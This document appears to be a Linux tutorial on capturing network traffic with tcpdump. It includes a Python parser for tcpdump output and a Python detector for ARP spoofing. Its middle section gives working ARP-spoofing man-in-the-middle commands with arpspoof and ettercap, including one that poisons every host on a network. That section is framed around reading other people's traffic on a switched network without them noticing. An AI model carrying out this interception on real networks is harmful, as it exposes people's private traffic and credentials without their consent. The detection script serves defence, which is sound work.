Capture and read network traffic in Linux:

  1. Launch terminal.
  2. Identify the network interface on which you want to capture traffic.
    $ ip address show
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
        link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
        inet 127.0.0.1/8 scope host lo
           valid_lft forever preferred_lft forever
        inet6 ::1/128 scope host
           valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
        link/ether 00:0c:29:2c:c1:16 brd ff:ff:ff:ff:ff:ff
        inet 192.168.111.201/24 brd 192.168.111.255 scope global dynamic ens33
           valid_lft 1691sec preferred_lft 1691sec
        inet6 fe80::20c:29ff:fe2c:c116/64 scope link
           valid_lft forever preferred_lft forever
  3. Install tcpdump for your distribution.
    $ sudo apt update && sudo apt install --assume-yes tcpdump # Ubuntu and Debian
  4. Run tcpdump against the network interface that you've selected.
    $ sudo tcpdump --interface=ens33
  5. Set a filter to view only traffic to and from a specific IP address.
    $ sudo tcpdump --interface=ens33 host 192.168.111.2
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:33:00.600161 IP host > _gateway: ICMP echo request, id 1625, seq 1, length 64
    05:33:00.600286 IP _gateway > host: ICMP echo reply, id 1625, seq 1, length 64
    05:33:00.602106 IP host.41923 > _gateway.domain: 57259+ PTR? 2.111.168.192.in-addr.arpa. (44)
    05:33:00.616784 IP _gateway.domain > host.41923: 57259 NXDomain*- 0/0/0 (44)
  6. Disable resolution of IP addresses to host names.
    $ sudo tcpdump --interface=ens33 host 192.168.111.2 -n
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:35:13.914066 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 3, length 64
    05:35:13.914414 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 3, length 64
    05:35:14.937278 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 4, length 64
    05:35:14.937723 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 4, length 64
  7. Filter on a specific port.
    $ sudo tcpdump --interface=ens33 port 80
    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on ens33, link-type EN10MB (Ethernet), capture size 262144 bytes
    05:40:12.229010 IP host.53904 > _gateway.http: Flags [S], seq 908428722, win 64240, options [mss 1460,sackOK,TS val 3777051478 ecr 0,nop,wscale 7], length 0
    05:40:12.229182 IP _gateway.http > host.53904: Flags [R.], seq 0, ack 908428723, win 32767, length 0
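As an added example (not part of the original guide), the following Python script parses the one-line summaries that `tcpdump -n` prints, as in steps 6 and 7, into structured records and summarises the capture. The sample lines are constructed from the page's own lab addresses and the ICMP, TCP and DNS lines shown above.

```python
import re
from collections import Counter

# Constructed "tcpdump -n" output (no name resolution), modelled on the captures above.
SAMPLE = """\
05:35:13.914066 IP 192.168.111.201 > 192.168.111.2: ICMP echo request, id 1662, seq 3, length 64
05:35:13.914414 IP 192.168.111.2 > 192.168.111.201: ICMP echo reply, id 1662, seq 3, length 64
05:40:12.229010 IP 192.168.111.201.53904 > 192.168.111.2.80: Flags [S], seq 908428722, win 64240, length 0
05:40:12.229182 IP 192.168.111.2.80 > 192.168.111.201.53904: Flags [R.], seq 0, ack 908428723, win 32767, length 0
05:40:13.001000 IP 192.168.111.201.41923 > 192.168.111.2.53: 57259+ PTR? 2.111.168.192.in-addr.arpa. (44)
"""

# "<timestamp> IP <src[.port]> > <dst[.port]>: <summary>"; IPv6 ("IP6") lines are skipped.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\S+) > (?P<dst>[^:]+): (?P<info>.*)$"
)

def split_endpoint(ep):
    """'192.168.111.2.80' -> ('192.168.111.2', 80); a bare address -> (address, None)."""
    addr, _, port = ep.rpartition(".")
    if port.isdigit() and addr.count(".") == 3:
        return addr, int(port)
    return ep, None

def classify(info):
    """Derive the protocol from the summary text tcpdump prints after the colon."""
    if info.startswith("ICMP"):
        return "ICMP"
    if info.startswith("Flags ["):
        return "TCP"
    return "UDP"  # DNS, NTP etc. are printed without a protocol tag; treat as UDP

def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, sport = split_endpoint(m["src"])
    dst, dport = split_endpoint(m["dst"])
    rec = {"ts": m["ts"], "src": src, "sport": sport, "dst": dst, "dport": dport,
           "proto": classify(m["info"]), "info": m["info"]}
    if rec["proto"] == "TCP":  # the TCP flags sit between "Flags [" and "]"
        rec["flags"] = m["info"][len("Flags ["):m["info"].index("]")]
    return rec

def summarize(text):
    """Count packets per (proto, src, dst) and list (host, port) pairs that answered with RST."""
    records = [r for r in map(parse_line, text.splitlines()) if r]
    counts = Counter((r["proto"], r["src"], r["dst"]) for r in records)
    refused = sorted({(r["src"], r["sport"]) for r in records
                      if r["proto"] == "TCP" and "R" in r["flags"]})
    return {"packets": len(records), "counts": counts, "refused": refused}
```

Feed it a saved capture with `summarize(open("capture.txt").read())`; the "refused" list shows which ports reset the connection, as the gateway did for port 80 in step 7.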

A network switch doesn’t forward packets to everyone in the network the way a network hub does, so in theory one person in the network cannot look at another person’s traffic. There are ways around this, however, one of which is ARP spoofing.

Method 1: Dsniff

This guide will just discuss how it is done without discussing the theory behind the process. The first step is to install the necessary program, which in this case is the dsniff package, containing the arpspoof program that we need. In Ubuntu or any other Debian-based distribution, it’s installable with apt as follows:

Installing (Ubuntu)

$ sudo apt install --assume-yes dsniff

Enable IP forwarding

To make sure the traffic is forwarded to the real destination as it reaches our machine, the following command needs to be run:

$ echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward # "sudo echo 1 > ..." fails: the redirection runs in the unprivileged shell

This keeps the target machine’s connection from being interrupted, so nobody should notice what we’re doing.

Run ARP spoofing

The following command tells the gateway “I am 192.168.0.100”, and the next command tells 192.168.0.100 “I am the gateway”.

$ sudo arpspoof 192.168.0.100 -t 192.168.0.1
$ sudo arpspoof 192.168.0.1 -t 192.168.0.100

With this, all the traffic from the machine to the gateway, and the other way around, passes through our machine first and is only then forwarded to the real destination. From here we can run any packet analysis tool such as tcpdump or Wireshark.

Method 2: Ettercap

There are programs, however, that make the whole process simpler. One of the favored programs for this is Ettercap. Ettercap can perform ARP spoofing as well, among its many other features. In Ubuntu, the package is called ettercap-gtk:

Installing (Ubuntu)

$ sudo apt install --assume-yes ettercap-gtk

Run ARP spoofing (GUI)

Running the program with the -G switch will run it in GTK rather than in ncurses.

$ sudo ettercap -G

At the menu, choose the following;

Sniff -> Unified sniffing

At the prompt, choose the network interface to be used. Normally it would be eth0:

Network Interface: eth0

At the menu again, choose the following to add all hosts in the network to the list:

Hosts -> Scan for hosts

Then the following will do the ARP spoofing for everyone in the network:

Mitm -> Arp poisoning -> Ok
Start -> Start sniffing

Run ARP spoofing (command)

The following command does the same thing as the GUI steps above, in one single command:

$ sudo ettercap -q -T -M arp // //
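The ARP replies that arpspoof or Ettercap emit are visible to anyone on the segment running a capture such as `sudo tcpdump -n -e -i ens33 arp`. As an added example from the defender’s side (not code from the page or from either tool), the following Python script reads lines in the form that command prints and flags the two things the methods above produce on the wire: replies nobody asked for, and one IP address answered by more than one MAC. The sample lines and the MAC addresses in them are constructed.

```python
import re

# Constructed "tcpdump -n -e arp" output (link-layer header included). The IP addresses are the
# page's own lab addresses; the MAC addresses are made up. The last two lines imitate what a
# continuous ARP-spoofing run looks like: a second MAC repeatedly claiming the gateway's address
# without any host having sent a who-has for it.
SAMPLE = """\
05:50:01.100000 00:0c:29:2c:c1:16 > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 192.168.111.2 tell 192.168.111.201, length 28
05:50:01.100300 00:50:56:e1:00:01 > 00:0c:29:2c:c1:16, ethertype ARP (0x0806), length 60: Reply 192.168.111.2 is-at 00:50:56:e1:00:01, length 46
05:50:05.000000 00:0c:29:aa:bb:cc > 00:0c:29:2c:c1:16, ethertype ARP (0x0806), length 42: Reply 192.168.111.2 is-at 00:0c:29:aa:bb:cc, length 28
05:50:07.000000 00:0c:29:aa:bb:cc > 00:0c:29:2c:c1:16, ethertype ARP (0x0806), length 42: Reply 192.168.111.2 is-at 00:0c:29:aa:bb:cc, length 28
"""

REQUEST_RE = re.compile(r"Request who-has (?P<ip>[\d.]+) tell (?P<asker>[\d.]+)")
REPLY_RE = re.compile(r"Reply (?P<ip>[\d.]+) is-at (?P<mac>[0-9a-f:]{17})")

def detect(lines):
    """Return (kind, ip, detail) alerts for unsolicited replies and IP-to-MAC conflicts."""
    known = {}      # ip -> first MAC seen answering for it
    asked = set()   # ips with an outstanding who-has request
    alerts = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            asked.add(m["ip"])
            continue
        m = REPLY_RE.search(line)
        if not m:
            continue
        ip, mac = m["ip"], m["mac"]
        if ip not in asked:
            # Legitimate hosts occasionally send gratuitous ARP (boot, address change);
            # a steady stream of them for the gateway address is the spoofing signature.
            alerts.append(("unsolicited-reply", ip, mac))
        asked.discard(ip)
        first = known.setdefault(ip, mac)
        if first != mac:
            # Also fires on a genuine NIC swap or DHCP reassignment, so confirm before acting.
            alerts.append(("mac-conflict", ip, f"{first} vs {mac}"))
    return alerts
```

Run it on a live capture with `detect(sys.stdin)` piped from the tcpdump command above, or compare the conflicting MACs against the switch’s port table or a static ARP entry for the gateway.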